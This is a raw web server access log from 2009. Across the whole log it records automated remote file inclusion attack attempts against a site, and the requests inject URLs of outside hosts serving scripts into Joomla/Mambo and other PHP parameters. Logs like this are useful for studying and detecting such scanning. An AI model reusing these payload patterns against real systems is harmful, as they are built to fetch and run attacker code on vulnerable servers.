129.215.82.1 - - [27/Sep/2009:19:46:39 -0700] "GET /logs/access_090629.log/%3CH1%3ENot%20Found%3C/H1%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:39 -0700] "GET /%3CH1%3ENot%20Found%3C/H1%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:39 -0700] "GET /logs/%3CH1%3ENot%20Found%3C/H1%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:39 -0700] "GET /The%20requested%20document%20was%20not%20found%20on%20this%20server.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:39 -0700] "GET /logs/access_090629.log/The%20requested%20document%20was%20not%20found%20on%20this%20server.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:39 -0700] "GET /logs/The%20requested%20document%20was%20not%20found%20on%20this%20server.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:39 -0700] "GET /%3CP%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:39 -0700] "GET /logs/access_090629.log/%3CP%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:39 -0700] "GET /logs/%3CP%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /%3CHR%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /logs/access_090629.log/%3CHR%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /logs/%3CHR%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /%3CADDRESS%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /logs/access_090629.log/%3CADDRESS%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /logs/%3CADDRESS%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /logs/access_090629.log/Web%20Server%20at%20unixstats.orghttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /Web%20Server%20at%20unixstats.orghttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /logs/Web%20Server%20at%20unixstats.orghttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /logs/access_090629.log/%3C/ADDRESS%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /%3C/ADDRESS%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /logs/%3C/ADDRESS%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /logs/access_090629.log/%3C/BODY%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /%3C/BODY%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:40 -0700] "GET /logs/%3C/BODY%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /logs/access_090629.log/%3C/HTML%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /%3C/HTML%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /logs/%3C/HTML%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /logs/access_090629.log/http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /logs/http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /logs/access_090629.log/%3C!--http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /%3C!--http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /logs/%3C!--http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /logs/access_090629.log/%20%20%20-%20Unfortunately,%20Microsoft%20has%20added%20a%20clever%20newhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /%20%20%20-%20Unfortunately,%20Microsoft%20has%20added%20a%20clever%20newhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:41 -0700] "GET /logs/%20%20%20-%20Unfortunately,%20Microsoft%20has%20added%20a%20clever%20newhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:42 -0700] "GET /logs/access_090629.log/%20%20%20-%20%22feature%22%20to%20Internet%20Explorer.%20If%20the%20text%20ofhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:42 -0700] "GET /%20%20%20-%20%22feature%22%20to%20Internet%20Explorer.%20If%20the%20text%20ofhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:42 -0700] "GET /logs/%20%20%20-%20%22feature%22%20to%20Internet%20Explorer.%20If%20the%20text%20ofhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:42 -0700] "GET /logs/access_090629.log/%20%20%20-%20an%20error's%20message%20is%20%22too%20small%22,%20specificallyhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:42 -0700] "GET /%20%20%20-%20an%20error's%20message%20is%20%22too%20small%22,%20specificallyhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:42 -0700] "GET /logs/access_090629.log/%20%20%20-%20its%20own%20error%20message.%20You%20can%20turn%20that%20off,http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:42 -0700] "GET /%20%20%20-%20less%20than%20512%20bytes,%20Internet%20Explorer%20returnshttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /%20%20%20-%20its%20own%20error%20message.%20You%20can%20turn%20that%20off,http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /logs/access_090629.log/%20%20%20-%20but%20it's%20pretty%20tricky%20to%20find%20switch%20calledhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /logs/%20%20%20-%20its%20own%20error%20message.%20You%20can%20turn%20that%20off,http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /logs/access_090629.log/%20%20%20-%20%22smart%20error%20messages%22.%20That%20means,%20of%20course,http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /%20%20%20-%20but%20it's%20pretty%20tricky%20to%20find%20switch%20calledhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /logs/%20%20%20-%20but%20it's%20pretty%20tricky%20to%20find%20switch%20calledhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /logs/%20%20%20-%20%22smart%20error%20messages%22.%20That%20means,%20of%20course,http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /%20%20%20-%20%22smart%20error%20messages%22.%20That%20means,%20of%20course,http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /logs/access_090629.log/%20%20%20-%20that%20short%20error%20messages%20are%20censored%20by%20default.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /logs/access_090629.log/%20%20%20-%20IIS%20always%20returns%20error%20messages%20that%20are%20longhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /logs/%20%20%20-%20that%20short%20error%20messages%20are%20censored%20by%20default.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /%20%20%20-%20that%20short%20error%20messages%20are%20censored%20by%20default.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /logs/access_090629.log/%20%20%20-%20enough%20to%20make%20Internet%20Explorer%20happy.%20Thehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /logs/%20%20%20-%20IIS%20always%20returns%20error%20messages%20that%20are%20longhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:43 -0700] "GET /%20%20%20-%20IIS%20always%20returns%20error%20messages%20that%20are%20longhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:44 -0700] "GET /logs/access_090629.log/%20%20%20-%20workaround%20is%20pretty%20simple:%20pad%20the%20errorhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:44 -0700] "GET /logs/%20%20%20-%20enough%20to%20make%20Internet%20Explorer%20happy.%20Thehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:44 -0700] "GET /%20%20%20-%20enough%20to%20make%20Internet%20Explorer%20happy.%20Thehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:44 -0700] "GET /logs/access_090629.log/%20%20%20-%20message%20with%20a%20big%20comment%20like%20this%20to%20push%20ithttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:44 -0700] "GET /%20%20%20-%20workaround%20is%20pretty%20simple:%20pad%20the%20errorhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:44 -0700] "GET /logs/access_090629.log/%20%20%20-%20over%20the%20five%20hundred%20and%20twelve%20bytes%20minimum.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:44 -0700] "GET /%20%20%20-%20message%20with%20a%20big%20comment%20like%20this%20to%20push%20ithttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:44 -0700] "GET /logs/access_090629.log/%20%20%20-%20Of%20course,%20that's%20exactly%20what%20you're%20readinghttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:44 -0700] "GET /%20%20%20-%20over%20the%20five%20hundred%20and%20twelve%20bytes%20minimum.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:44 -0700] "GET /logs/access_090629.log/%20%20%20-%20right%20now.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:45 -0700] "GET /%20%20%20-%20Of%20course,%20that's%20exactly%20what%20you're%20readinghttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:45 -0700] "GET /logs/access_090629.log/%20%20%20--%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:45 -0700] "GET /%20%20%20-%20right%20now.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:45 -0700] "GET /%20%20%20--%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:47 -0700] "GET /logs/%20%20%20-%20workaround%20is%20pretty%20simple:%20pad%20the%20errorhttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:47 -0700] "GET /logs/%20%20%20-%20message%20with%20a%20big%20comment%20like%20this%20to%20push%20ithttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:47 -0700] "GET /logs/%20%20%20-%20over%20the%20five%20hundred%20and%20twelve%20bytes%20minimum.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:48 -0700] "GET /logs/%20%20%20-%20Of%20course,%20that's%20exactly%20what%20you're%20readinghttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:48 -0700] "GET /logs/%20%20%20-%20right%20now.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:46:48 -0700] "GET /logs/%20%20%20--%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:19:47:55 -0700] "GET /logs/access_090420.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:19:47:56 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:19:50:21 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:19:50:43 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:19:51:45 -0700] "GET /logs/access_090316.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:19:51:45 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:19:51:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:19:52:03 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.80.207.36 - - [27/Sep/2009:19:53:40 -0700] "GET /logs/access_090817.log/errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.80.207.36 - - [27/Sep/2009:19:53:40 -0700] "GET /errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.80.207.36 - - [27/Sep/2009:19:53:41 -0700] "GET /logs/errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:19:54:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:19:54:37 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:19:55:55 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:19:55:55 -0700] "GET /logs/access_090810.log/?sourcedir=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.80.207.36 - - [27/Sep/2009:19:56:10 -0700] "GET /errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.80.207.36 - - [27/Sep/2009:19:56:54 -0700] "GET /logs/access_090817.log/errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.80.207.36 - - [27/Sep/2009:19:56:54 -0700] "GET /errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.80.207.36 - - [27/Sep/2009:19:56:55 -0700] "GET /logs/errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:19:57:20 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.80.207.36 - - [27/Sep/2009:19:57:56 -0700] "GET /logs/access_090316.log/errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:19:58:32 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:19:58:32 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [27/Sep/2009:19:58:32 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:19:59:23 -0700] "GET /logs/access.log%20%20//login.php?dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:19:59:24 -0700] "GET /logs//login.php?dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:19:59:24 -0700] "GET /login.php?dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:19:59:35 -0700] "GET /logs/access_090316.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:19:59:35 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:19:59:35 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.80.207.36 - - [27/Sep/2009:19:59:43 -0700] "GET /logs/access_090406.log/errors.php?error=http://163.19.225.120/rfi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:20:00:21 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:20:00:21 -0700] "GET /logs/access.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:20:00:21 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.52.202 - - [27/Sep/2009:20:00:39 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.newbluesun.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
165.194.232.107 - - [27/Sep/2009:20:02:09 -0700] "GET /logs/access.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://pappermint.casu.net/bbs/bjork/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.30.194.163 - - [27/Sep/2009:20:04:11 -0700] "GET /logs/access.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:20:04:54 -0700] "GET /logs/access_090316.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:20:05:27 -0700] "GET /login.php?dir=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:20:05:29 -0700] "GET /logs//login.php?dir=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:20:05:34 -0700] "GET /logs/access.log%20%20//login.php?dir=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.135.59.136 - - [27/Sep/2009:20:08:26 -0700] "GET /logs/?sourcedir=http://nashi-deti.org.ua/plugins/editors/idxx.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
